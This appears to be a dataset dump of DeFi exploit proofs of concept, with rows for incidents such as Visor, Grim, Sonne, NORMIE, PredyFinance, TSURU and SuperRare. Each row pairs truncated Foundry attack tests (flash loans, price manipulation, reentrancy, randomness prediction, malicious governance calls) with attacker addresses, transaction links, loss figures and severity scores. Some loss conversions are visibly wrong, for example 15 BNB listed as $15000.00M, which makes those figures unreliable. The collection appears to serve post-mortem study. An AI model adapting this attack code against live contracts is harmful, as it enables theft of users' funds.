function testExploit() public { emit log_named_decimal_uint("Attacker BUSD balance before attack", BUSD.balanceOf(address(this)), 18); Pool.flash(address(this), 1_950_000 ether, 0, "0x123"); emit log_named_decimal_uint("Attacker BUSD balance after attack", BUSD.balanceOf(address(this)), 18); ...
true
~56K BUSD
https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
https://bscscan.com/address/0x88f9e1799465655f0dd206093dbd08922a1d9e28
$56.0K
4.95
low
SBT Exploit (2024-07)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { IRewardsHypervisor irrewards = IRewardsHypervisor(0xC9f27A50f82571C1C8423A42...
exploit_poc
Visor
2021-12
Visor_exp.sol
null
b940f6bf00db087a
2026-01-07T10:59:16.540275
postmortems
unknown
13,849,006
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { irrewards.deposit(100_000_000_000_000_000_000_000_000, address(this), msg.sender); // VISR_Balance = visr.balanceOf(msg.sender); emit log_named_uint("Attacker VIST Balance", visr.balanceOf(msg.sender)); }
true
Unknown
2.53
low
Visor Exploit (2021-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { address btcAddress = 0x321162Cd933E2Be498Cd2267a90534A804051b11; address wftmAddress = 0x21be370D5312f44cB42ce377BC9b8a0cEF1A4C83; address routerAddress ...
exploit_poc
Grim
2021-12
Grim_exp.sol
flash_loan
08c61f4c748481e7
2026-01-07T10:59:16.540311
postmortems
unknown
25,345,002
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { //Flash Loan WFTM and "BTC" frm BeethovenX IERC20[] memory loanTokens = new IERC20[](2); loanTokens[0] = wftm; loanTokens[1] = btc; uint256[] memory loanAmounts = new uint256[](2); loanAmounts[0] = wftmLoanAmount; loanAmounts[1] = b...
true
Unknown
4.98
low
Grim Exploit (2021-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // tx: https://bscscan.com/tx/0xea95925eb0438e04d0d81dc270a99ca9fa18b94ca8c6e34272fc9e09266fcf1d // analysis: https://blocksecteam.medium.com/the-analysis-of-nerve-bridge-security-incident-ead361a...
exploit_poc
NerveBridge
2021-12
NerveBridge_exp.sol
flash_loan
a765f759e2988103
2026-01-07T10:59:16.540359
postmortems
bsc
null
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExp() public { // 1. flashloan 50000 busd from fortube flashloanProvider.flashloan(address(this), busd, 50_000 ether, "0x"); console.log("final busd profit: ", IERC20(busd).balanceOf(address(this)) / 10 ** IERC20(busd).decimals()); }
true
Unknown
4.81
low
NerveBridge Exploit (2021-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0x5446bf2b57749abdab01813a50ce36246177f3437599f3a56bc1554f596b2c3a // GUY : https://x.com/SlowMist_Team/status/1795648617530995130 // Profit : ~33 ...
exploit_poc
EXcommunity
2024-05
EXcommunity_exp.sol
null
7cf2884c90c8c29e
2026-01-07T10:59:16.540421
postmortems
unknown
39,123,756
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
2.82
low
EXcommunity Exploit (2024-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0x12e8c24dec36a29fdd9b9d7a8b587b3abd2519089b6438c194e6e5eb357b68d8 // GUY : https://x.com/ChainAegis/status/1789490986588205529 // Profit : ~32K US...
exploit_poc
TGC
2024-05
TGC_exp.sol
null
7d2dc2cd8ce94777
2026-01-07T10:59:16.540483
postmortems
unknown
38,623,654
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function attack() public { swap_token_to_token(address(USDT), address(TGC), 100 ether); approveAll(); address(vulnContract).call(abi.encodeWithSelector(bytes4(0x836aefb0), 100_000_000_000_000_000_000)); vm.warp(block.timestamp + 5 hours); // emit log_named_decimal_uint("Pair USDT...
true
Unknown
3.58
low
TGC Exploit (2024-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~$20M USD$ // Attacker EOA1 : https://optimistic.etherscan.io/address/0x5d0d99e9886581ff8fcb01f35804317f5ed80bbb // Attacker EOA2 : https://optimistic.etherscan.io/address...
exploit_poc
Sonne
2024-05
Sonne_exp.sol
flash_loan
3d5684bcdd8a3be9
2026-01-07T10:59:16.540531
postmortems
ethereum
120,062,493
~$20M USD$
20,000,000
null
null
null
null
null
null
true
false
true
critical
~$20M USD$
flash-loan
function testExploit() public { // 1. Execute proposals bytes memory data1 = hex"fca7820b0000000000000000000000000000000000000000000000000429d069189e0000"; bytes memory data2 = hex"f2b3abbd0000000000000000000000007320bd5fa56f8a7ea959a425f0c0b8cac56f741e"; bytes memory data3 = hex"55ee...
true
~$20M USD$
$20.00M
8
high
Sonne Exploit (2024-05)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Profit : ~32K USD // TX : https://app.blocksec.com/explorer/tx/bsc/0x2c0ada695a507d7a03f4f308f545c7db4847b2b2c82de79e702d655d8c95dadb // GUY : https://twitter.com/PeckShieldAlert/status/1788153...
exploit_poc
GPU
2024-05
GPU_exp.sol
flash_loan
414e27a4b2d09043
2026-01-07T10:59:16.540587
postmortems
bsc
38,539,572
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public balanceLog { busdWbnbPair.swap(22_600 ether, 0, address(this), "0x42"); }
true
Unknown
4.36
low
GPU Exploit (2024-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0xc7927a68464ebab1c0b1af58a5466da88f09ba9b30e6c255b46b1bc2e7d1bf09 // GUY : https://twitter.com/SlowMist_Team/status/1787330586857861564 // Profit ...
exploit_poc
OSN
2024-05
OSN_exp.sol
null
f47c6f21459cbf06
2026-01-07T10:59:16.540653
postmortems
bsc
38,474,365
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
3
low
OSN Exploit (2024-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : $490K // Attack Tx : https://app.blocksec.com/explorer/tx/base/0xa618933a0e0ffd0b9f4f0835cc94e523d0941032821692c01aa96cd6f80fc3fd // Price : https://dexscreener.com/bas...
exploit_poc
NORMIE
2024-05
NORMIE_exp.sol
flash_loan
5868d184bf5e8154
2026-01-07T10:59:16.540716
postmortems
base
14,952,783
$490K
490,000
null
null
null
https://app.blocksec.com/explorer/tx/base/0xa618933a0e0ffd0b9f4f0835cc94e523d0941032821692c01aa96cd6f80fc3fd
null
null
true
false
true
high
$490K
flash-loan
function testExploit() public { console.log("---------------------------------------------------"); console.log("ETH Balance before this attack: ", address(this).balance / 1e18); console.log("---------------------------------------------------"); // 1. Swap 2 ETH to NORMIE on SushiV2 ...
true
$490K
https://app.blocksec.com/explorer/tx/base/0xa618933a0e0ffd0b9f4f0835cc94e523d0941032821692c01aa96cd6f80fc3fd
$490.0K
8.37
high
NORMIE Exploit (2024-05)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : $464K // Attacker : https://arbiscan.io/address/0x76b02ab483482740248e2ab38b5a879a31c6d008 // Attack Contract : https://arbiscan.io/address/0xb79714634895f52a4f6a75eceb58c962...
exploit_poc
PredyFinance
2024-05
PredyFinance_exp.sol
null
bdbb450f4647d99b
2026-01-07T10:59:16.540783
postmortems
arbitrum
null
$464K
464,000
https://arbiscan.io/address/0x76b02ab483482740248e2ab38b5a879a31c6d008
https://arbiscan.io/address/0xb79714634895f52a4f6a75eceb58c96246370149
https://arbiscan.io/address/0x7b8b944ab2f24c829504a7a6d70fce5298f2147c
https://arbiscan.io/tx/0xbe163f651d23f0c9e4d4a443c0cc163134a31a1c2761b60188adcfd33178f50f
null
null
true
true
false
high
$464K
unknown
function testExploit() public balanceLog { USDC.approve(address(predyPool), type(uint256).max); WETH.approve(address(predyPool), type(uint256).max); //implement exploit code here AddPairLogic.AddPairParams memory addPairParam = AddPairLogic.AddPairParams({ marginId: address(...
true
$464K
https://arbiscan.io/address/0x76b02ab483482740248e2ab38b5a879a31c6d008
https://arbiscan.io/address/0xb79714634895f52a4f6a75eceb58c96246370149
https://arbiscan.io/address/0x7b8b944ab2f24c829504a7a6d70fce5298f2147c
https://arbiscan.io/tx/0xbe163f651d23f0c9e4d4a443c0cc163134a31a1c2761b60188adcfd33178f50f
$464.0K
9
high
PredyFinance Exploit (2024-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "./../interface.sol"; import "../basetest.sol"; // @KeyInfo - Total Lost : 140K // Attacker :https://basescan.org/address/0x7A5Eb99C993f4C075c222F9327AbC7426cFaE386 // Attack Contract :https://basescan.org/address/0xa2209b48506c4e7f3a879ec1c1c2c4e...
exploit_poc
TSURU
2024-05
TSURU_exp.sol
null
4b5c9e53b951cf50
2026-01-07T10:59:16.540849
postmortems
base
null
140K
140,000
https://basescan.org/address/0x7A5Eb99C993f4C075c222F9327AbC7426cFaE386
https://basescan.org/address/0xa2209b48506c4e7f3a879ec1c1c2c4ee16c2c017
https://basescan.org/address/0x75Ac62EA5D058A7F88f0C3a5F8f73195277c93dA
https://basescan.org/tx/0xe63a8df8759f41937432cd34c590d85af61b3343cf438796c6ed2c8f5b906f62
https://base.tsuru.wtf/usdtsuru-exploit-incident-report
https://x.com/shoucccc/status/1788941548929110416
true
true
false
high
140K
unknown
function testExploit() public balanceLog { //First mint tokens with vulerable on onERC1155Received function wrapper.onERC1155Received(address(0), address(this), 0, 418, new bytes(0)); assertEq(wrapper.balanceOf(address(this)), expectedTokens, "Not enough tokens"); //Swap the tokens to E...
true
140K
https://basescan.org/address/0x7A5Eb99C993f4C075c222F9327AbC7426cFaE386
https://basescan.org/address/0xa2209b48506c4e7f3a879ec1c1c2c4ee16c2c017
https://basescan.org/address/0x75Ac62EA5D058A7F88f0C3a5F8f73195277c93dA
https://basescan.org/tx/0xe63a8df8759f41937432cd34c590d85af61b3343cf438796c6ed2c8f5b906f62
https://base.tsuru.wtf/usdtsuru-exploit-incident-report
https://x.com/shoucccc/status/1788941548929110416
$140.0K
7.87
medium
TSURU Exploit (2024-05)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~645K // TX : https://app.blocksec.com/explorer/tx/bsc/0x660837a1640dd9cc0561ab7ff6c85325edebfa17d8b11a3bb94457ba6dcae18c // Attacker : https://bscscan.com/address/0x51177db1ff3b450007958447946a2eee388288d2 ...
exploit_poc
Tradeonorion
2024-05
Tradeonorion_exp.sol
oracle_manipulation
0f8fb071182d6efd
2026-01-07T10:59:16.540927
postmortems
bsc
39,104,878
~645K
645,000
https://bscscan.com/address/0x51177db1ff3b450007958447946a2eee388288d2
https://bscscan.com/address/0xf8bfac82bdd7ac82d3aeec98b9e1e73579509db6
null
null
null
null
true
false
true
high
~645K
oracle-manipulation
function testExploit() public { emit log_named_decimal_uint("[Begin] Attacker ORN balance before exploit", ORN.balanceOf(address(this)), 8); emit log_named_decimal_uint("[Begin] Attacker BNB balance before exploit", address(this).balance, 18); emit log_named_decimal_uint("[Begin] Attacker XRP ba...
true
https://bscscan.com/address/0x51177db1ff3b450007958447946a2eee388288d2
https://bscscan.com/address/0xf8bfac82bdd7ac82d3aeec98b9e1e73579509db6
$645.0K
8
high
Tradeonorion Exploit (2024-05)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~76 ETH // Attacker : 0x55Db954F0121E09ec838a20c216eABf35Ca32cDD // Attack Contract : 0x55f5aac4466eb9b7bbeee8c05b365e5b18b5afcc // Vulnerable Contract : 0xe51D3dE9b81916D...
exploit_poc
SCROLL
2024-05
SCROLL_exp.sol
null
76f217b2f7ad6e71
2026-01-07T10:59:16.541018
postmortems
ethereum
19,971,611
~76 ETH
76
null
null
null
https://etherscan.io/tx/0x661505c39efe1174da44e0548158db95e8e71ce867d5b7190b9eabc9f314fe91
null
null
true
true
false
low
~76 ETH
unknown
function testExploit() public { SCROLL.balanceOf(address(universalRouter)); bytes memory commands = hex"05"; bytes[] memory inputs = new bytes[](1); inputs[0] = abi.encode(address(SCROLL), address(SCROLL_creater), uint256(1)); universalRouter.execute(commands, inputs); SC...
true
~76 ETH
https://etherscan.io/tx/0x661505c39efe1174da44e0548158db95e8e71ce867d5b7190b9eabc9f314fe91
$76
6.4
medium
SCROLL Exploit (2024-05)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~15 BNB // Attacker : 0xc468D9A3a5557BfF457586438c130E3AFbeC2ff9 // Attack Contract : 0xfcECDBC62DEe7233E1c831D06653b5bEa7845FcC // Vulnerable Contract : 0x9BDF251435cBC67...
exploit_poc
SATURN
2024-05
SATURN_exp.sol
null
03a05901aa7a6bdb
2026-01-07T10:59:16.541075
postmortems
bsc
38,488,209
~15 BNB
15,000,000,000
null
null
null
https://bscscan.com/tx/0x948132f219c0a1adbffbee5d9dc63bec676dd69341a6eca23790632cb9475312
null
null
true
false
false
critical
~15 BNB
unknown
function testExploit() public balanceLog { approveAll(); // init saturn token EnableSwitch(false); vm.startPrank(holderOfToken); SATURN.transfer(attacker, SATURN.balanceOf(holderOfToken)); vm.stopPrank(); EnableSwitch(true); // start attack pan...
true
~15 BNB
https://bscscan.com/tx/0x948132f219c0a1adbffbee5d9dc63bec676dd69341a6eca23790632cb9475312
$15000.00M
7.72
medium
SATURN Exploit (2024-05)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 1.7eth // Attack Tx : https://etherscan.io/tx/0x3bba4fb6de00dd38df3ad68e51c19fe575a95a296e0632028f101c5199b6f714 // @Info interface IBurner is IERC20 { function c...
exploit_poc
Burner
2024-05
Burner_exp.sol
flash_loan
d39b5d0020edc54e
2026-01-07T10:59:16.541129
postmortems
ethereum
19,917,290
1.7eth
1.7
null
null
null
https://etherscan.io/tx/0x3bba4fb6de00dd38df3ad68e51c19fe575a95a296e0632028f101c5199b6f714
null
null
true
false
true
low
1.7eth
flash-loan
function testExploit() public { vm.deal(address(this), 70 ether); //simulation flashloan weth_.deposit{value: 70 ether}(); weth_.approve(address(router_), type(uint256).max); pnt_.approve(address(router_), type(uint256).max); address[] memory path = new address[](2); pat...
true
1.7eth
https://etherscan.io/tx/0x3bba4fb6de00dd38df3ad68e51c19fe575a95a296e0632028f101c5199b6f714
$2
7.13
medium
Burner Exploit (2024-05)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // Profit : ~180K USD // TX : https://app.blocksec.com/explorer/tx/bsc/0x3ad998a01ad1f1bbe6dba6a08e658c1749dabfa4a07da20ded3c73bcd6970d20 // GUY : https://x.com/Phalcon_xyz/status/179574682806485449...
exploit_poc
MetaDragon
2024-05
MetaDragon_exp.sol
null
29e1e34216f613dc
2026-01-07T10:59:16.541174
postmortems
bsc
39,141,426
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public balance_log { for (uint256 i = 0; i < endTokenId; i++) { bytes memory calldatas = abi.encodeWithSignature("transfer(address,uint256)", meta_token, i); // don't check return value meta_token.call(calldatas); } emit log_named_uint("...
true
Unknown
2.96
low
MetaDragon Exploit (2024-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import ".././interface.sol"; // @KeyInfo - Total Lost : Lost: =>10000 USD(WINR tokens) // TX : https://app.blocksec.com/explorer/tx/arbitrum/0xf57f041cb6d8a10e11edab50b84e49b59ff834c7d114d1e049cedd654c36194d // Attacker :htt...
exploit_poc
MixedSwapRouter
2024-05
MixedSwapRouter_exp.sol
null
2269ea33e2814e6d
2026-01-07T10:59:16.541229
postmortems
arbitrum
216,881,055
Lost: =>10000 USD(WINR tokens)
10,000
https://arbiscan.io/address/0xfeef112831cc8f790abe71b4b196c220ee26ecf3
https://arbiscan.io/address/0x4fba400b95cd9e3d7e4073ad6e6bbaf41e640cdf
https://arbiscan.io/address/0x58637aaac44e2a2f190d9e1976e236d86d691542
null
null
null
true
true
false
medium
Lost: =>10000 USD(WINR tokens)
unknown
function attack() internal { address one = create_contract(1); }
true
Lost: =>10000 USD(WINR tokens)
https://arbiscan.io/address/0xfeef112831cc8f790abe71b4b196c220ee26ecf3
https://arbiscan.io/address/0x4fba400b95cd9e3d7e4073ad6e6bbaf41e640cdf
https://arbiscan.io/address/0x58637aaac44e2a2f190d9e1976e236d86d691542
$10.0K
8
high
MixedSwapRouter Exploit (2024-05)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~$18K // Attacker : https://bscscan.com/address/0xb9596d6e53d81981b9f06ca2ca6d3e422232d575 // Attack Contract : https://bscscan.com/address/0x258850ec735f6532fe34fe24ef9628...
exploit_poc
TCH
2024-05
TCH_exp.sol
null
2f2ae0a9ea9360fb
2026-01-07T10:59:16.541316
postmortems
bsc
null
~$18K
18,000
https://bscscan.com/address/0xb9596d6e53d81981b9f06ca2ca6d3e422232d575
https://bscscan.com/address/0x258850ec735f6532fe34fe24ef9628992a9b7e84
https://bscscan.com/address/0x5d78cfc8732fd328015c9b73699de9556ef06e8e
https://bscscan.com/tx/0xa94338d8aa312ed4b97b2a4dcb27f632b1ade6f3abec667e3bf9f002a75dabe0
null
https://x.com/DecurityHQ/status/1791180322882629713
true
true
false
medium
~$18K
unknown
function testExploit() public { deal(address(BUSDT), address(this), 0); emit log_named_decimal_uint( "Exploiter BUSDT balance before attack", BUSDT.balanceOf(address(this)), BUSDT.decimals() ); BUSDT_USDC.flash(address(this), flashAmount, 0, bytes("")); emit log_nam...
true
~$18K
https://bscscan.com/address/0xb9596d6e53d81981b9f06ca2ca6d3e422232d575
https://bscscan.com/address/0x258850ec735f6532fe34fe24ef9628992a9b7e84
https://bscscan.com/address/0x5d78cfc8732fd328015c9b73699de9556ef06e8e
https://bscscan.com/tx/0xa94338d8aa312ed4b97b2a4dcb27f632b1ade6f3abec667e3bf9f002a75dabe0
https://x.com/DecurityHQ/status/1791180322882629713
$18.0K
9
high
TCH Exploit (2024-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "forge-std/interfaces/IERC20.sol"; // @KeyInfo - Total Lost : $12K // Attacker : https://bscscan.com/address/0x36a6135672035507b772279d99a9f7445f2d1601 // Attack Contract : https://bscscan.com/address/0x471038827c05c87c2...
exploit_poc
RedKeysCoin
2024-05
RedKeysCoin_exp.sol
null
31dd0a7a07d250b4
2026-01-07T10:59:16.541404
postmortems
bsc
null
$12K
12,000
https://bscscan.com/address/0x36a6135672035507b772279d99a9f7445f2d1601
https://bscscan.com/address/0x471038827c05c87c23e9dba5331c753337fd918b
https://bscscan.com/address/0x71e3056aa4985de9f5441f079e6c74454a3c95f0
https://bscscan.com/tx/0x8d5fb97b35b830f8addcf31c8e0c6135f15bbc2163d891a3701ada0ad654d427
null
https://x.com/SlowMist_Team/status/1794975336192438494
true
true
false
medium
$12K
unknown
function testExploit() public balanceLog { for (uint256 i = 0; i < 50; i++) { // get current counter uint256 counter = game.counter(); // estimate bet result by calculating the result of the function randomNumber uint16 betResultExpectation = uint16(randomNumber(...
true
$12K
https://bscscan.com/address/0x36a6135672035507b772279d99a9f7445f2d1601
https://bscscan.com/address/0x471038827c05c87c23e9dba5331c753337fd918b
https://bscscan.com/address/0x71e3056aa4985de9f5441f079e6c74454a3c95f0
https://bscscan.com/tx/0x8d5fb97b35b830f8addcf31c8e0c6135f15bbc2163d891a3701ada0ad654d427
https://x.com/SlowMist_Team/status/1794975336192438494
$12.0K
7.4
medium
RedKeysCoin Exploit (2024-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~200K // TX : https://app.blocksec.com/explorer/tx/bsc/0x1350cc72865420ba5d3c27234fd4665ad25c021b0a75ba03bc8340a1b1f98a45 // Attacker : https://bscscan.com/address/0x69...
exploit_poc
Liquiditytokens
2024-05
Liquiditytokens_exp.sol
null
2619ce248a744463
2026-01-07T10:59:16.541496
postmortems
bsc
39,198,657
~200K
200,000
https://bscscan.com/address/0x6951eb8a4a1dab360f2230fb654551335d560ec0
https://bscscan.com/address/0xbdfbb387fbf20379c016998ac609871c3357d749
null
null
null
null
true
false
false
high
~200K
unknown
function attack() internal {
true
https://bscscan.com/address/0x6951eb8a4a1dab360f2230fb654551335d560ec0
https://bscscan.com/address/0xbdfbb387fbf20379c016998ac609871c3357d749
$200.0K
7
medium
Liquiditytokens Exploit (2024-05)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "./../interface.sol"; import "forge-std/console.sol"; // @KeyInfo - Total Lost : 330K // Attacker : https://etherscan.io/address/0xFcE19F8f823759b5867ef9a5055A376f20c5E454 // Attack Contract : https://etherscan.io/addr...
exploit_poc
GFOX
2024-05
GFOX_exp.sol
null
520d755f8b36e472
2026-01-07T10:59:16.541574
postmortems
ethereum
null
330K
330,000
https://etherscan.io/address/0xFcE19F8f823759b5867ef9a5055A376f20c5E454
https://etherscan.io/address/0x86C68d9e13d8d6a70b6423CEB2aEdB19b59F2AA5
https://etherscan.io/address/0x47c4b3144de2c87a458d510c0c0911d1903d1686
https://etherscan.io/tx/0x12fe79f1de8aed0ba947cec4dce5d33368d649903cb45a5d3e915cc459e751fc
https://neptunemutual.com/blog/how-was-galaxy-fox-token-exploited/
https://twitter.com/CertiKAlert/status/1788751142144401886
true
true
false
high
330K
unknown
false
330K
https://etherscan.io/address/0xFcE19F8f823759b5867ef9a5055A376f20c5E454
https://etherscan.io/address/0x86C68d9e13d8d6a70b6423CEB2aEdB19b59F2AA5
https://etherscan.io/address/0x47c4b3144de2c87a458d510c0c0911d1903d1686
https://etherscan.io/tx/0x12fe79f1de8aed0ba947cec4dce5d33368d649903cb45a5d3e915cc459e751fc
https://neptunemutual.com/blog/how-was-galaxy-fox-token-exploited/
https://twitter.com/CertiKAlert/status/1788751142144401886
$330.0K
5.2
medium
GFOX Exploit (2024-05)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.0; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 101k USD // Attacker : https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e44414cdbafe // Attack Contract : https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e4...
exploit_poc
WETC_Token
2025-07
WETC_Token_exp.sol
null
9cd0c57c99f797e5
2026-01-07T10:59:16.541625
postmortems
bsc
null
101k USD
101,000
https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e44414cdbafe
https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e44414cdbafe
https://bscscan.com/address/0xaf68efb3c1e81aad5cdb3d4962c8815fb754c688
https://bscscan.com/tx/0x2b6b411adf6c452825e48b97857375ff82b9487064b2f3d5bc2ca7a5ed08d615
https://t.me/evmhacks/78?single
null
true
true
false
high
101k USD
unknown
function testExploit() public balanceLog { // The exploit begins by taking a large flash loan from a PancakeSwap V3 pool. IPancakeV3Pool(pancakeV3Pool).flash(address(this), borrowAmount, 0, ""); }
true
101k USD
https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e44414cdbafe
https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e44414cdbafe
https://bscscan.com/address/0xaf68efb3c1e81aad5cdb3d4962c8815fb754c688
https://bscscan.com/tx/0x2b6b411adf6c452825e48b97857375ff82b9487064b2f3d5bc2ca7a5ed08d615
https://t.me/evmhacks/78?single
$101.0K
8.02
high
WETC_Token Exploit (2025-07)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 43k USD // Attacker : https://bscscan.com/address/0xd7235d08a48cbd3f63b9faa16130f2fdb50b2341 // Attack Contract : https://bscscan.com/address/0x399eff46b7d458575ebbbb572098e6...
exploit_poc
Stepp2p
2025-07
Stepp2p_exp.sol
null
06b0923499592d03
2026-01-07T10:59:16.541685
postmortems
bsc
null
43k USD
43,000
https://bscscan.com/address/0xd7235d08a48cbd3f63b9faa16130f2fdb50b2341
https://bscscan.com/address/0x399eff46b7d458575ebbbb572098e62e38f3c993
https://bscscan.com/address/0x99855380e5f48db0a6babeae312b80885a816dce
https://bscscan.com/tx/0xe94752783519da14315d47cde34da55496c39546813ef4624c94825e2d69c6a8
null
https://x.com/TenArmorAlert/status/1946887946877149520
true
true
false
medium
43k USD
unknown
function testExploit() public balanceLog { //implement exploit code here bytes memory data = "0x623269464a7178"; IPancakeV3PoolActions(PANCAKE_V3_USDC_USDT).flash(address(this), 50_000 ether, 0, data); }
true
43k USD
https://bscscan.com/address/0xd7235d08a48cbd3f63b9faa16130f2fdb50b2341
https://bscscan.com/address/0x399eff46b7d458575ebbbb572098e62e38f3c993
https://bscscan.com/address/0x99855380e5f48db0a6babeae312b80885a816dce
https://bscscan.com/tx/0xe94752783519da14315d47cde34da55496c39546813ef4624c94825e2d69c6a8
https://x.com/TenArmorAlert/status/1946887946877149520
$43.0K
7.23
medium
Stepp2p Exploit (2025-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 13k USD // Attacker : https://bscscan.com/address/0xa3e18e6028b1ca09433157cd6a5e807ffe705350 // Attack Contract : https://bscscan.com/address/0x383794a0c68e5c8c050f8f361b26a2...
exploit_poc
VDS
2025-07
VDS_exp.sol
flash_loan
6f816a4c12ceb88f
2026-01-07T10:59:16.541730
postmortems
bsc
null
13k USD
13,000
https://bscscan.com/address/0xa3e18e6028b1ca09433157cd6a5e807ffe705350
https://bscscan.com/address/0x383794a0c68e5c8c050f8f361b26a22b3f60eccf
https://bscscan.com/address/0x6ce69d7146dbaae18c11c36d8d94428623b29d5a
https://bscscan.com/tx/0x0e01fd8798f970fd689014cb215e622aca8b7c8c243176c5b504e0043402e31f
null
https://x.com/SlowMist_Team/status/1945672192471302645
true
true
true
medium
13k USD
flash-loan
function testExploit() public balanceLog { // Step 1: Flash loan 20k BSC_USD from Moolah IERC20(BSC_USD).approve(MOOLAH, type(uint256).max); IMoolah(MOOLAH).flashLoan(BSC_USD, 20_000 ether, ""); }
true
13k USD
https://bscscan.com/address/0xa3e18e6028b1ca09433157cd6a5e807ffe705350
https://bscscan.com/address/0x383794a0c68e5c8c050f8f361b26a22b3f60eccf
https://bscscan.com/address/0x6ce69d7146dbaae18c11c36d8d94428623b29d5a
https://bscscan.com/tx/0x0e01fd8798f970fd689014cb215e622aca8b7c8c243176c5b504e0043402e31f
https://x.com/SlowMist_Team/status/1945672192471302645
$13.0K
8.58
high
VDS Exploit (2025-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 730K USD // Attacker : https://etherscan.io/address/0x5b9b4b4dafbcfceea7afba56958fcbb37d82d4a2 // Attack Contract : https://etherscan.io/address/0x08947cedf35f9669012bda6fda9...
exploit_poc
SuperRare
2025-07
SuperRare_exp.sol
null
058c476f57e17172
2026-01-07T10:59:16.541783
postmortems
ethereum
null
730K USD
730,000
https://etherscan.io/address/0x5b9b4b4dafbcfceea7afba56958fcbb37d82d4a2
https://etherscan.io/address/0x08947cedf35f9669012bda6fda9d03c399b017ab
https://etherscan.io/address/0xfFB512B9176D527C5D32189c3e310Ed4aB2Bb9eC
https://app.blocksec.com/explorer/tx/eth/0xd813751bfb98a51912b8394b5856ae4515be6a9c6e5583e06b41d9255ba6e3c1
null
https://x.com/SlowMist_Team/status/1949770231733530682
true
true
false
high
730K USD
unknown
function testExploit() public balanceLog { // deploy attack contract and etch it to ATTACK_CONTRACT address AttackContract acTemp = new AttackContract(); bytes memory code = address(acTemp).code; vm.etch(ATTACK_CONTRACT, code); AttackContract ac = AttackContract(ATTACK_CONTRACT);...
true
730K USD
https://etherscan.io/address/0x5b9b4b4dafbcfceea7afba56958fcbb37d82d4a2
https://etherscan.io/address/0x08947cedf35f9669012bda6fda9d03c399b017ab
